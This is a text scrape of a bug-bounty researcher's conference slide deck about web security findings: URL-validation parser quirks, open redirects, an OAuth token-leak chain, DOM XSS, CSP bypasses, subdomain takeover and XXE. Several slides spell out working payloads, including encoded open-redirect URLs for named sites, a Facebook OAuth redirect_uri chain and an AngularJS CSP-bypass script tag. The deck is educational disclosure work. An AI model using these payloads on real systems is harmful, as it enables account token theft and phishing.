detectify
play

detectify Go hack yourself or someone else will Frans Rosn - PowerPoint PPT Presentation

detectify Go hack yourself or someone else will Frans Rosn @fransrosen Frans Rosn Security Advisor @detectify ( twitter: @fransrosen ) Blog at labs.detectify.com HackerOne #5 @ hackerone.com/thanks "The Swedish Ninja"


  1. detectify Go hack yourself … or someone else will Frans Rosén @fransrosen

  2. Frans Rosén Security Advisor @detectify ( twitter: @fransrosen ) Blog at labs.detectify.com HackerOne #5 @ hackerone.com/thanks "The Swedish Ninja" detectify

  3. Rundown 1. Background 2. Approaching a target 3. Domain/URL validation 4. Free money + Automation 5. End detectify

  4. How it started detectify

  5. THEN I FREAKED OUT osv… detectify

  6. Thailand detectify

  7. Thailand detectify

  8. Approaching a target detectify

  9. SWFs detectify

  10. SWFs ZeroClipboard.swf column3d.swf flowplayer.swf video.swf swfupload.swf OneClipboard.swf clippy.swf flashmediaelement.swf Jplayer.swf plupload.swf amline.swf video-js.swf Line.swf … detectify

  11. Facebook Connect By @nirgoldschlager and @homakov 
 http://homakov.blogspot.se/2013/02/hacking-facebook-with-oauth2-and-chrome.html 
 http://www.breaksec.com/?p=6039 detectify

  12. Facebook Connect https://www.facebook.com/v2.2/dialog/oauth ?scope=publish_actions,email &client_id=298315034451 
 &response_type=token &redirect_uri=https://www.example.com/login detectify

  13. Facebook Connect https://www.facebook.com/v2.2/dialog/oauth ?scope=publish_actions,email &client_id=298315034451 
 &response_type=token &redirect_uri=https://xxx.example.com/yyy No restrictions! detectify

  14. URL-validation is hard #1 http://y.com\@x.com detectify

  15. URL-validation is hard #1 http://y.com\@x.com java: new URL(d); = x.com php: parse_url(d); = x.com chrome: document.createElement('a').href=d; = y.com detectify

  16. RFC 3986 ABNF #RTFM https://tools.ietf.org/html/rfc3986#page-49 detectify

  17. PHP FIXED! https://github.com/php/php-src/commit/ f705063e23183c073837bb76eea6a49d721b37f2#diff-8c81b7e6f1bafce737814315214a5f23R245 detectify

  18. Open Redirects in real life https://www.victim.com/logout?redirect_url=https://example.com\@www.victim.com https://www.linkedin.com/uas/login?session_redirect=https://example.com%252f@www.linkedin.com%2Fsettings https://vimeo.com/log_in?redirect=/%09/example.com https://test6473.zendesk.com/access/login ?return_to=//example.com:%252525252f@test6473.zendesk.com/x https://trello.com/login?returnUrl=/\example.com detectify

  19. Firefox… detectify

  20. Firefox… Chrome: Invalid Safari: Domain not found detectify

  21. Firefox… Chrome: Invalid Safari: Domain not found Firefox: example.com ! detectify

  22. Firefox… Chrome: Invalid Safari: Domain not found CVE-2015-7195 Firefox: example.com ! https://www.mozilla.org/en-US/security/advisories/mfsa2015-129/ detectify

  23. Firefox + Prezi… https://prezi.com/redirect/?url=//example.com%0a%2523.prezi.com detectify

  24. Firefox + Prezi… https://prezi.com/redirect/?url=//example.com%0a%2523.prezi.com HTTP/1.1 301 Location: //example.com%0a%23.prezi.com detectify

  25. Firefox + Prezi… https://prezi.com/redirect/?url=//example.com%0a%2523.prezi.com HTTP/1.1 301 Location: //example.com%0a%23.prezi.com https://www.facebook.com/v2.2/dialog/oauth?scope=publish_actions,email &response_type=token &redirect_uri=https://prezi.com/redirect/%3furl=https://example.com%25250a%252523.prezi.com &client_id=298315034451 detectify

  26. Firefox + Prezi… https://prezi.com/redirect/?url=//example.com%0a%2523.prezi.com HTTP/1.1 301 Location: //example.com%0a%23.prezi.com https://www.facebook.com/v2.2/dialog/oauth?scope=publish_actions,email &response_type=token &redirect_uri=https://prezi.com/redirect/%3furl=https://example.com%25250a%252523.prezi.com &client_id=298315034451 NOO! :( detectify

  27. Firefox + Prezi… detectify

  28. 3rd-party scripts (get)?(query|url|qs|hash)param location\.(hash|href|search)\.match detectify

  29. 3rd-party scripts k.type='text/javascript'; var m,src=(m=location.href.match(/\bkxsrc=([^&]+)\b/)) && decodeURIComponent(m[1]); k.src=src||'https://cdn.krxd.net/controltag?confid=HrUwtkcl'; detectify

  30. 3rd-party scripts detectify

  31. Uber XSS k.src=src||'https://cdn.krxd.net/controltag?confid=HrUwtkcl'; detectify

  32. Uber XSS k.src=src||'https://cdn.krxd.net/controltag?confid=HrUwtkcl'; detectify

  33. CSP bypass script-src 'self' https://ajax.googleapis.com https://html5sec.org/minichallenges/3 detectify

  34. CSP bypass script-src 'self' https://ajax.googleapis.com <script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/ angular.js></script> https://html5sec.org/minichallenges/3 detectify

  35. CSP bypass script-src 'self' https://cdn.mxpnl.com detectify

  36. CSP bypass script-src 'self' https://cdn.mxpnl.com detectify

  37. CSP bypass script-src 'self' https://www.googleadservices.com detectify

  38. CSP bypass script-src 'self' https://www.googleadservices.com detectify

  39. CSP bypass detectify

  40. Google’s CSP evaluator https://csp-evaluator.withgoogle.com detectify

  41. Gotta catch’em all! detectify

  42. October 2014 detectify https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/

  43. Subdomain Takeover campaign.site.com Campaign! detectify https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/

  44. Subdomain Takeover campaign.site.com Campaign! Fake site! detectify https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/

  45. Customer Responses detectify

  46. Subdomains detectify

  47. Subdomains detectify

  48. Facebook detectify

  49. Facebook detectify

  50. Facebook detectify

  51. Facebook POST /rest/v1.1/me/transactions?http_envelope=1 HTTP/1.1 Host: public-api.wordpress.com cart[blog_id]=44444444 detectify

  52. Facebook detectify

  53. Facebook detectify

  54. Uber detectify

  55. Uber detectify

  56. Uber detectify

  57. Uber detectify

  58. September 2016 detectify http://blog.pentestnepal.tech/post/149985438982/reading-ubers-internal-emails-uber-bug-bounty

  59. September 2016 detectify http://blog.pentestnepal.tech/post/149985438982/reading-ubers-internal-emails-uber-bug-bounty

  60. MX-records detectify

  61. Conflict check + Validation detectify

  62. Oh, add this! detectify

  63. post-host-master-admin detectify

  64. Tadaa! detectify

  65. We now get postmaster! detectify

  66. detectify

  67. Google XXE https://blog.detectify.com/2014/04/11/how-we-got-read-access-on-googles-production-servers/ detectify

  68. Google XXE detectify

  69. Google XXE detectify

  70. Google XXE detectify

  71. Google XXE detectify

  72. Google XXE detectify

  73. Chrome View Source detectify

  74. Chrome… detectify

  75. Chrome… detectify

  76. Chrome… detectify

  77. Chrome… detectify

  78. Chrome… detectify

  79. Chrome… detectify

  80. Chrome… detectify

  81. Chrome… *click something* detectify

  82. Chrome… detectify

  83. GitHub’s search OMG! detectify http://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/

  84. GitHub’s search OMG! detectify

  85. GitHub’s search OMG! detectify

  86. GitHub’s search OMG! detectify

  87. GitHub’s search OMG! detectify

  88. The email, 02:35 detectify

  89. The email, 02:35 detectify

  90. The response detectify

  91. detectify Go hack yourself … or someone else will Frans Rosén (@fransrosen) – www.detectify.com

More recommend